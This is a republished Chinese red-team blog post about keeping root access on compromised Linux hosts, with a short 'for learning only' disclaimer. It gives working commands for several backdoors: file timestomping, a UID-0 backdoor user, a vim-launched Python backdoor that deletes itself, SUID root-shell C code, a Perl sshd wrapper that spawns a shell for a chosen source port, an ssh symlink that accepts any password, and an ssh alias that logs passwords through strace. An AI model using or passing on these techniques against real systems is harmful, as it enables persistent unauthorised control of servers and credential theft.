专栏首页物联网IOT安全【技术分享】红队权限维持方法杂谈

【技术分享】红队权限维持方法杂谈

以下内容与测试工具仅限技术交流,严禁用于非法攻击

本次分享分两部分,分别介绍Linux和Windows的权限维持,今天主要介绍Linux的,为了节省时间,这里就选择我平时用的比较多的较为好用的方法来介绍

0X01:Linux篇

这里说的方法都是可以或者说需要配合使用的,具体还要看自己的发散性思维,但是本人(作者BiggieB)从今天开始不再分享任何与思路及实战相关的内容

  1. Linux修改文件时间
  2. add user
  3. vim后门
  4. suid
  5. SSH
  6. 隐藏文件(包括但不限于参数混淆拦截rm)#本文不研究
  7. Cron/alias

1.1 顾名思义,如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间在来看shell.php的时间就可以判断shell.php的生成时间有问题。

解决方法 touch -r index.php shell.php

这就是一个需要配合其他的方法来利用的隐藏手段,不多赘述

2.1 passwd写入

/etc/passwd各部分含义:

用户名:密码:用户ID:组ID:身份描述:用户的家目录:用户登录后所使用的SHELL

/etc/shadow各部分含义:

用户名:密码的MD5加密值:自系统使用以来口令被修改的天数:口令的最小修改间隔:口令更改的周期:口令失效的天数:口令失效以后帐号会被锁定多少天:用户帐号到期时间:保留字段尚未使用

根据格式写入就好,百度上有很详细的教程

2.2在 Unix 体系下,UID 为 0 就是 root 权限。所以渗透的时候可以添加一个 UID 为 0 的用户作为后门

useradd -o -u 0 123

3.1vim 后门

cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

dir.py设置成你后门的功能

4.1 suid,简单的讲就是生成一个二进制文件,文件运行的过程中你拥有root权限,你可以以root权限执行任何命令

#vim suid.c#include<stdlib.h>main () {setuid(0);system("/bin/bash");}

然后把他gcc成二进制文件,赋予suid权限,剩下的自己发挥,你甚至可以在web中调用这个文件然后执行系统命令

5.1 wrapper

目标机

cd /usr/sbinmv sshd ../binecho '#!/usr/bin/perl' > sshdecho 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshdecho 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd/etc/init.d/sshd restart

本机

socat STDIO TCP4:192.168.2.11:22,souceport=19526

解释一下,首先启动sshd,脚本运行到getpeername的时候正则匹配不到,运行下一行,启动真正的sshd,然后建立连接,然后创建一个子进程,子进程回到我们的脚本,重新定向,这样就能获取客户的TCP端口,如果是19526就建立一个shell

5.2 ssh软连接后门

ln -sf /usr/sbin/sshd /tmp/su/tmp/su -oPort=任意端口

PAM进行身份验证时你的配置信息是su,而su只检测uid 0就可认证成功,可以输入任意密码登陆

5.3 公钥免密登陆

ssh-keygen -t rsa //生成公钥

将id_rsa.pub内容放到目标.ssh/authorized_keys里

7.1 Cron,这个很容易被蓝队发现,定时执行任务,不过多介绍

在redis中可以利用这个获得shell

7.2

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

好了,文章到这就差不多了,这些都是我平时比较常用的维持权限方法,昨天发个文章有人问我不是弱口令怎么办,今天发完这篇文章我不希望有人问我不是root权限怎么办,谢谢

郑重声明:以上内容仅供学习交流,严禁用于非法交流!!!!!!!

本文分享自微信公众号 - 物联网IOT安全(IOTsafety)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-02-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 看大佬如何破解智能门锁

    上一篇文章的分析中,我们发现Yale智能门锁的通信中存在两个问题,本篇文章将分为两个部分描述如何利用这两个问题:

    用户7021283
  • 智能汽车安全入门|世界智能驾驶挑战赛总结

    这两天参加了世界智能汽车挑战赛,比赛使用了visual threat的汽车仿真设备。不过这个文章题目起的有些夸张,准确的说应该是CAN总线安全学习入门

    用户7021283
  • 刺向巴勒斯坦的致命毒针——双尾蝎 APT 组织的攻击活动分析与总结

    双尾蝎APT组织(又名:APT-C-23),该组织从 2016 年 5 月开始就一直对巴勒斯坦教育机构、军事机构等重要领域展开了有组织、有计划、有针对性的长时间...

    用户7021283
  • 两个斐波拉切数列运算的时间复杂度 顶

    有人提出了递归算法的时间复杂度问题,的确如此,递归的时间复杂度是随着数量级成指数增长的。

    算法之名
  • 在DataGrid中创建一个弹出式Details窗口

    在DataGrid中创建一个弹出式Details窗口 这篇文章来自DotNetJunkie的提议。他最初写信要求我们提供一个关于如何创建在DataGrid 中...

    阿新
  • Java设计模式-简单工厂模式

    1)简单工厂模式是属于创建型模式,是工厂模式的一种。简单工厂模式是由一个工厂对象决定创建出哪一种产品类的实例。简单工厂模式是工厂模式家族中简单使用的模式

    桑鱼
  • 是兄弟,就一起吃鸡!来,这个小程序拉你「进群」

    最近,一款「佛系养蛙」的日本游戏风靡网络,相信你已经在朋友圈见过它了。不出意外,这个「旅行青蛙」也迅速登上了中国区 AppStore 的免费游戏的榜首。

    知晓君
  • 【译】用于肺部CT肺结节分类的深度特征学习摘要

    zhwhong
  • 科大讯飞胡郁演讲实录:人工智能是这个时代最伟大的魔法师

    唯物按:9月份锤子的发布会结束后,科大讯飞股票应声上涨,成为罗永浩相声专场的最大赢家。 这其中有一些运气的成分,但在这种运气之前,讯飞已经做了很多铺垫工作。科大...

    AI研习社
  • python--控制台版2048

    游戏规则也很通俗移动,四个方向移动,相同就相加,不同就搁置,然后把最终刷到2048则游戏结束。

    sjw1998

扫码关注云+社区

领取腾讯云代金券